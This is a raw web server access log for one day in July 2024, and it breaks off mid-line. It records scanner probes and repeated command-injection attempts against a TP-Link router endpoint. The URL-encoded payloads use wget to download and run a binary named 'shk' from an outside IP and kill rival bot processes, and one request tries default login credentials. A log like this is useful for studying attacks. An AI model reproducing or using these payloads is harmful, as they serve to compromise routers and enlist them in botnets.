174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:00:22:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 185.124.246.165 - - [04/Jul/2024:00:40:12 +0200] "GET / HTTP/1.1" 200 1895 185.180.140.4 - - [04/Jul/2024:00:43:07 +0200] "GET / HTTP/1.1" 200 1895 185.180.140.4 - - [04/Jul/2024:00:43:12 +0200] "GET /console HTTP/1.1" 404 725 87.121.69.27 - - [04/Jul/2024:00:43:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.121 - - [04/Jul/2024:01:12:12 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.54 - - [04/Jul/2024:01:22:03 +0200] "GET / HTTP/1.0" 200 1895 45.148.10.174 - - [04/Jul/2024:02:22:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:02:22:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 138.68.24.241 - - [04/Jul/2024:02:28:47 +0200] "-" 400 1930 138.68.24.241 - - [04/Jul/2024:02:28:47 +0200] "-" 400 1930 138.68.24.241 - - [04/Jul/2024:02:28:47 +0200] "GET / HTTP/1.1" 200 1895 138.68.24.241 - - [04/Jul/2024:02:28:48 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 141.98.11.15 - - [04/Jul/2024:02:52:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.176 - - [04/Jul/2024:03:04:59 +0200] "-" 400 1930 198.235.24.176 - - [04/Jul/2024:03:04:59 +0200] "-" 400 1930 185.191.126.213 - - [04/Jul/2024:03:16:06 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [04/Jul/2024:03:19:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 165.22.99.189 - - [04/Jul/2024:03:50:32 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804 184.105.247.230 - - [04/Jul/2024:04:38:29 +0200] "-" 400 1930 45.148.10.174 - - [04/Jul/2024:05:05:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:05:05:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.156.130.6 - - [04/Jul/2024:05:32:29 +0200] "GET /owncloud/status.php HTTP/1.1" 404 741 45.156.130.6 - - [04/Jul/2024:05:32:31 +0200] "GET /status.php HTTP/1.1" 404 728 87.121.69.27 - - [04/Jul/2024:05:35:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 88.214.25.63 - - [04/Jul/2024:05:55:04 +0200] "-" 400 1930 206.168.32.106 - - [04/Jul/2024:06:03:38 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [04/Jul/2024:06:03:41 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [04/Jul/2024:06:03:41 +0200] "GET /favicon.ico HTTP/1.1" 404 729 174.138.2.203 - - [04/Jul/2024:06:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:12:30 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:06:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 45.89.245.57 - - [04/Jul/2024:06:27:00 +0200] "GET / HTTP/1.1" 200 1895 161.35.21.228 - - [04/Jul/2024:06:27:01 +0200] "GET / HTTP/1.0" 200 1895 138.68.87.7 - - [04/Jul/2024:06:27:17 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 138.68.87.7 - - [04/Jul/2024:06:27:17 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 138.68.87.158 - - [04/Jul/2024:06:28:43 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 138.68.93.254 - - [04/Jul/2024:06:28:55 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 206.189.55.166 - - [04/Jul/2024:06:30:59 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 206.189.55.166 - - [04/Jul/2024:06:33:03 +0200] "-" 400 1930 206.189.55.166 - - [04/Jul/2024:06:33:03 +0200] "-" 400 1930 206.189.55.166 - - [04/Jul/2024:06:33:03 +0200] "-" 400 1930 138.68.93.254 - - [04/Jul/2024:06:43:46 +0200] "GET / HTTP/1.1" 200 1895 52.76.71.100 - - [04/Jul/2024:06:43:47 +0200] "GET /favicon.ico HTTP/1.1" 404 729 103.175.168.106 - - [04/Jul/2024:07:05:13 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 749 45.148.10.174 - - [04/Jul/2024:07:34:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:07:34:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 138.68.87.76 - - [04/Jul/2024:07:41:56 +0200] "-" 400 1930 87.121.69.27 - - [04/Jul/2024:07:47:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 77.90.7.116 - - [04/Jul/2024:08:19:56 +0200] "GET / HTTP/1.1" 200 1895 77.90.7.116 - - [04/Jul/2024:08:19:56 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 77.90.7.116 - - [04/Jul/2024:08:19:56 +0200] "GET / HTTP/1.1" 200 1895 77.90.7.116 - - [04/Jul/2024:08:19:56 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 122.228.86.230 - - [04/Jul/2024:09:07:15 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [04/Jul/2024:09:17:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.156.78 - - [04/Jul/2024:10:09:50 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.72 - - [04/Jul/2024:10:10:20 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.76 - - [04/Jul/2024:10:10:38 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.78 - - [04/Jul/2024:10:10:47 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 45.148.10.174 - - [04/Jul/2024:10:27:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:10:27:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 122.228.86.230 - - [04/Jul/2024:10:36:02 +0200] "GET / HTTP/1.1" 200 1895 23.95.200.178 - - [04/Jul/2024:10:41:06 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [04/Jul/2024:10:57:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 122.228.86.230 - - [04/Jul/2024:11:18:02 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:12:12:27 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 87.121.69.27 - - [04/Jul/2024:12:22:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:12:22:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 82.58.109.110 - - [04/Jul/2024:12:35:49 +0200] "GET / HTTP/1.0" 200 1895 77.90.7.22 - - [04/Jul/2024:12:53:59 +0200] "GET / HTTP/1.1" 200 1895 77.90.7.22 - - [04/Jul/2024:12:53:59 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 77.90.7.22 - - [04/Jul/2024:12:53:59 +0200] "GET / HTTP/1.1" 200 1895 77.90.7.22 - - [04/Jul/2024:12:53:59 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 44.220.185.174 - - [04/Jul/2024:13:00:39 +0200] "GET / HTTP/1.1" 200 1895 172.202.177.80 - - [04/Jul/2024:13:26:14 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [04/Jul/2024:13:40:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.88.91.41 - - [04/Jul/2024:13:48:28 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 84.54.51.43 - - [04/Jul/2024:14:06:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [04/Jul/2024:14:14:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:14:14:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 62.81.185.180 - - [04/Jul/2024:15:00:45 +0200] "GET / HTTP/1.1" 200 1895 3.21.205.38 - - [04/Jul/2024:15:02:01 +0200] "GET / HTTP/1.1" 200 1895 207.154.249.126 - - [04/Jul/2024:15:08:38 +0200] "GET / HTTP/1.1" 200 1895 159.203.163.52 - - [04/Jul/2024:15:18:14 +0200] "GET / HTTP/1.1" 200 1895 152.32.128.85 - - [04/Jul/2024:15:35:17 +0200] "GET / HTTP/1.1" 200 1895 152.32.128.85 - - [04/Jul/2024:15:35:19 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.128.85 - - [04/Jul/2024:15:35:20 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 152.32.128.85 - - [04/Jul/2024:15:35:20 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.128.85 - - [04/Jul/2024:15:35:40 +0200] "GET /axis2-admin/ HTTP/1.1" 404 734 152.32.128.85 - - [04/Jul/2024:15:35:41 +0200] "GET /axis2/ HTTP/1.1" 404 728 152.32.128.85 - - [04/Jul/2024:15:35:41 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 744 152.32.128.85 - - [04/Jul/2024:15:35:42 +0200] "GET null HTTP/1.1" 400 1994 152.32.128.85 - - [04/Jul/2024:15:35:43 +0200] "GET /struts/webconsole.html HTTP/1.1" 404 744 152.32.128.85 - - [04/Jul/2024:15:35:43 +0200] "GET /?actionErrors=1111 HTTP/1.1" 200 1895 152.32.128.85 - - [04/Jul/2024:15:35:44 +0200] "GET /invoker/readonly HTTP/1.1" 404 738 195.181.38.249 - - [04/Jul/2024:15:48:44 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [04/Jul/2024:15:56:03 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 202.168.187.146 - - [04/Jul/2024:16:23:36 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [04/Jul/2024:16:29:44 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [04/Jul/2024:16:29:48 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.106 - - [04/Jul/2024:16:29:48 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [04/Jul/2024:16:54:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [04/Jul/2024:18:01:23 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 174.138.2.203 - - [04/Jul/2024:18:12:28 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:28 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:28 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:28 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [04/Jul/2024:18:12:29 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 138.199.60.17 - - [04/Jul/2024:18:16:35 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [04/Jul/2024:18:16:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [04/Jul/2024:18:22:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 45.148.10.174 - - [04/Jul/2024:18:36:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:18:36:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 122.228.86.230 - - [04/Jul/2024:18:44:47 +0200] "GET / HTTP/1.1" 200 1895 185.94.29.106 - - [04/Jul/2024:18:56:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.224.128.63 - - [04/Jul/2024:19:20:00 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [04/Jul/2024:19:20:00 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.63 - - [04/Jul/2024:19:20:00 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [04/Jul/2024:19:20:00 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 211.233.24.7 - - [04/Jul/2024:19:26:42 +0200] "HEAD / HTTP/1.1" 200 - 211.233.24.7 - - [04/Jul/2024:19:26:44 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [04/Jul/2024:19:46:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 106.75.175.181 - - [04/Jul/2024:19:51:02 +0200] "GET /.DS_Store HTTP/1.1" 404 727 45.55.69.150 - - [04/Jul/2024:20:01:24 +0200] "-" 400 1930 45.55.69.150 - - [04/Jul/2024:20:01:24 +0200] "-" 400 1930 45.55.69.150 - - [04/Jul/2024:20:01:24 +0200] "GET / HTTP/1.1" 200 1895 45.55.69.150 - - [04/Jul/2024:20:01:24 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 161.35.201.15 - - [04/Jul/2024:20:36:32 +0200] "GET /?v=1&ip=157.90.17.105&port=8080 HTTP/1.1" 200 1895 104.168.70.165 - - [04/Jul/2024:20:38:37 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.89 - - [04/Jul/2024:20:39:29 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [04/Jul/2024:20:43:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:20:43:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 195.23.78.179 - - [04/Jul/2024:21:10:47 +0200] "-" 400 1930 195.23.78.179 - - [04/Jul/2024:21:10:52 +0200] "GET / HTTP/1.1" 200 1895 195.23.78.179 - - [04/Jul/2024:21:11:30 +0200] "GET / HTTP/1.1" 200 1895 139.28.37.56 - - [04/Jul/2024:21:15:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [04/Jul/2024:21:48:07 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [04/Jul/2024:21:48:10 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [04/Jul/2024:21:48:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 205.210.31.12 - - [04/Jul/2024:22:14:02 +0200] "GET / HTTP/1.0" 200 1895 45.148.10.174 - - [04/Jul/2024:22:22:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [04/Jul/2024:22:22:14 +0200] "GET 